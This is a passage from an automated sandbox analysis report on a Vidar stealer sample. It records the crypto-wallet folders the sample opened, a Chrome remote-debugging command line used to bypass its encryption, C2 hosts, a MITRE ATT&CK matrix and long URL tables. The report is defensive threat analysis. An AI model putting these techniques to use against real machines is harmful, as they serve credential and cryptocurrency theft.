    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

    Remote Access Functionality

    barindex
    Attempt to bypass Chrome Application-Bound Encryption
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Yara detected Vidar stealer
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		12
    Process Injection    		111
    Masquerading    		2
    OS Credential Dumping    		1
    Virtualization/Sandbox Evasion    		Remote Services11
    Input Capture    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Virtualization/Sandbox Evasion    		11
    Input Capture    		3
    Process Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		1
    Remote Access Software    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Extra Window Memory Injection    		12
    Process Injection    		Security Account Manager3
    File and Directory Discovery    		SMB/Windows Admin Shares3
    Data from Local System    		1
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information    		NTDS15
    System Information Discovery    		Distributed Component Object Model1
    Clipboard Data    		3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Extra Window Memory Injection    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582918 Sample: CenteredDealing.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 92 46 h7h7h7.online 2->46 48 uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm 2->48 50 t.me 2->50 70 Suricata IDS alerts for network traffic 2->70 72 Yara detected Vidar stealer 2->72 74 Sigma detected: Search for Antivirus process 2->74 76 AI detected suspicious sample 2->76 10 CenteredDealing.exe 29 2->10         started        signatures3 process4 process5 12 cmd.exe 2 10->12         started        file6 38 C:\Users\user\AppData\Local\...\Rip.com, PE32 12->38 dropped 78 Drops PE files with a suspicious file extension 12->78 16 Rip.com 28 12->16         started        20 cmd.exe 1 12->20         started        22 cmd.exe 2 12->22         started        24 9 other processes 12->24 signatures7 process8 dnsIp9 40 h7h7h7.online 116.203.13.109, 443, 49738, 49739 HETZNER-ASDE Germany 16->40 42 t.me 149.154.167.99, 443, 49737 TELEGRAMRU United Kingdom 16->42 44 127.0.0.1 unknown unknown 16->44 62 Attempt to bypass Chrome Application-Bound Encryption 16->62 64 Tries to harvest and steal ftp login credentials 16->64 66 Tries to harvest and steal browser information (history, passwords, etc) 16->66 68 Tries to steal Crypto Currency Wallets 16->68 26 chrome.exe 16->26         started        29 cmd.exe 1 16->29         started        signatures10 process11 dnsIp12 52 192.168.2.4, 138, 443, 49154 unknown unknown 26->52 54 239.255.255.250 unknown Reserved 26->54 31 chrome.exe 26->31         started        34 conhost.exe 29->34         started        36 timeout.exe 1 29->36         started        process13 dnsIp14 56 play.google.com 142.250.186.174, 443, 49767 GOOGLEUS United States 31->56 58 www.google.com 172.217.16.132, 443, 49750, 49751 GOOGLEUS United States 31->58 60 2 other IPs or domains 31->60

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    CenteredDealing.exe8%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    plus.l.google.com
    		216.58.212.174
    		truefalse
      		high
      play.google.com
      		142.250.186.174
      		truefalse
        		high
        t.me
        		149.154.167.99
        		truefalse
          		high
          h7h7h7.online
          		116.203.13.109
          		truetrue
            		unknown
            www.google.com
            		172.217.16.132
            		truefalse
              		high
              uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm
              		unknown
              		unknownfalse
                		unknown
                apis.google.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://t.me/w211etfalse
                    		high
                    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtab8yu37g.12.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=8yu37g.12.drfalse
                          		high
                          http://anglebug.com/4633chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://anglebug.com/7382chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.9z5fu3.12.drfalse
                                		high
                                https://issuetracker.google.com/284462263chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://polymer.github.io/AUTHORS.txtchrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://docs.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://anglebug.com/7714chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://anglebug.com/6248chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023814051.00002110013DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://anglebug.com/6929chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://anglebug.com/5281chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc949z5fu3.12.drfalse
                                                        		high
                                                        https://issuetracker.google.com/255411748chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://anglebug.com/7246chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://anglebug.com/7369chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://anglebug.com/7489chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://chrome.google.com/webstorechrome.exe, 00000011.00000003.1997007279.0000211000D4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive-daily-2.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://polymer.github.io/PATENTS.txtchrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8yu37g.12.drfalse
                                                                        		high
                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta9z5fu3.12.drfalse
                                                                          		high
                                                                          http://www.autoitscript.com/autoit3/XRip.com, 0000000C.00000000.1708125558.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp, Bridal.8.dr, Rip.com.1.drfalse
                                                                            		high
                                                                            https://google-ohttp-relay-join.fastly-edge.com/hjxlchrome.exe, 00000011.00000003.1977551360.00006C7800684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://issuetracker.google.com/161903006chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.ecosia.org/newtab/8yu37g.12.drfalse
                                                                                  		high
                                                                                  https://drive-daily-1.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://drive-daily-5.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://plus.google.comchromecache_95.19.drfalse
                                                                                        		high
                                                                                        http://anglebug.com/3078chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://anglebug.com/7553chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://anglebug.com/5375chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://anglebug.com/5371chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://anglebug.com/4722chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://anglebug.com/7556chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://drive-preprod.corp.google.com/chrome.exe, 00000011.00000003.1982128120.0000211000498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesbs0r9z.12.drfalse
                                                                                                        		high
                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/6692chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://issuetracker.google.com/258207403chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anglebug.com/3502chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://anglebug.com/3623chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://anglebug.com/3625chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/3624chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/5007chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://anglebug.com/3862chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000011.00000003.2000162669.0000211001064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005019612.0000211000D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1999600762.0000211000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000790684.0000211000D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004952954.0000211000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004924465.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996906655.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997007279.0000211000D4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/4836chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://issuetracker.google.com/issues/166475273chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://anglebug.com/4384chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 00000011.00000003.2024160852.0000211001460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022513743.00002110012A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022221372.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023959664.0000211001394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://anglebug.com/3970chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://apis.google.comchrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023814051.00002110013DC000.00000004.00000800.00020000.00000000.sdmp, chromecache_95.19.dr, chromecache_98.19.drfalse
                                                                                                                                          		high
                                                                                                                                          http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000011.00000003.2004762908.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004815231.0000211001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005345645.000021100120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005576177.0000211000B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002880143.0000211001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004527203.0000211000D34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2004731734.00002110006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://labs.google.com/search?source=ntpchrome.exe, 00000011.00000003.2024160852.0000211001460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022513743.00002110012A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022221372.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023959664.0000211001394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://domains.google.com/suggest/flowchromecache_95.19.drfalse
                                                                                                                                                		high
                                                                                                                                                https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000011.00000003.2025823811.00006C780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1977099612.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://anglebug.com/7604chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://anglebug.com/7761chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://ogs.google.com/widget/app/so?eom=1chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023814051.00002110013DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anglebug.com/7760chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg9z5fu3.12.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico8yu37g.12.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/5901chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/3965chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/6439chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/7406chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/searchchrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
